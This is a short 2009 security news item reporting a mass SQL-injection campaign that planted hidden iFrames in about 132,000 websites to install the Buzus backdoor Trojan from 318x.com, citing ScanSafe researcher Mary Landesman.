132,000 Web Pages Infested with Malware Links
On December 10, 2009, an SQL-injection assault contaminated a huge 132,000 websites as it installed malicious software from 318x.com. Subsequently, the attack planted a backdoor Trojan -Buzuz that featured a rootkit. Buzbuz is known for stealing financial data like credit card particulars.
ScanSafe discovered the attack for the first time on November 21, 2009. Subsequently, it reported about the attack on December 9, 2009 when some 125,000 websites had been affected. The report states that the sites affected include knowledgespeak.com, parisattitude.com, and yementimes.com.
The affected sites are hosted at different geographical locations and bear different sizes. These factors become evident when the iFrame is searched on Google.
Users who access the infected web-pages find a hidden link which downloads code from several websites connected to 318x.com. If the host computer contains un-patched versions of Internet Explorer, Adobe Flash or any other Microsoft program, then the code exploits them so that malware called Backdoor.Win3.Buzus.croo is installed, said Mary Landesman, Researcher at ScanSafe, as reported by TheRegister on December 10, 2009.
According to Landesman, it appears that a new malware gang is behind the particular SQL-injection assaults. The ScanSafe researcher also states that she isn't quite certain that the gang is adequately accustomed to the method of attack. Though it might be an experienced attackers gang, this large-scale website assault is their foremost attempt.
ScanSafe in an advisory states that the attack seems to be an ongoing project, since the company has come across the malware codes employed during the attacks' final stage. ScanSafe finds that certain codes are being changed and some eliminated with new ones brought in. Several files are .jpg files, while most have the .js extension.
The security researchers commented that the latest mass website attack was one more instance of sophisticated attacks. Other such advanced attacks produced links in a dynamic way that caused great hindrance to researchers in locating them via online searches. For example, the Gumblar attack, which installed attack codes directly on compromised websites, posed immense problems to white-hat experts in removing the unwanted elements.
Related article: “Loopholes did not cause online banking thefts”: ICBC
» SPAMfighter News - 21-12-2009